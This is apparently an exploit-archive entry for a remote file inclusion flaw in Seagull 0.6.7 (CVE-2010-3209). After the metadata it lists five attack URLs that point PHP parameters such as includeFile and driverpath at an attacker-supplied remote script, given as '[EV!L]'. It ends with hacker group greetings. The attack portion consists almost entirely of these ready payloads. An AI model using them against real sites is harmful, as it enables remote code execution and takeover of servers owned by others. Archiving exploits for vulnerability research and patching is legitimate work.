[] NeoSense

seagull 0.6.7 - Remote File Inclusion

Author: FoX HaCkEr
type: webapps
platform: php
port: 
date_added: 2010-08-30 
date_updated: 2010-08-30 
verified: 0 
codes: CVE-2010-3209;OSVDB-67807;OSVDB-67806;OSVDB-67805;OSVDB-67804 
tags: 
aliases:  
screenshot_url:  
application_url: 

=================================
seagull-0.6.7 <===remote file inclode
=================================
# Exploit Title : seagull-0.6.7 <===remote file inclode

# Date: 2010-08-29

# Author : FoX HaCkEr

#Contact : MKQ@HoTmAiL.CoM

# SiTe : www.sec4ever.com

# Download: http://seagullproject.org/

# Version:6.7

# Google dork: [sorry]

======================================================================================================
exploit :

http://localhost/fog/lib/pear/Config/Container.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet.php?driverpath=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet/Output.php?path=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]

=======================================================================================================

Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members Sa-HaCkE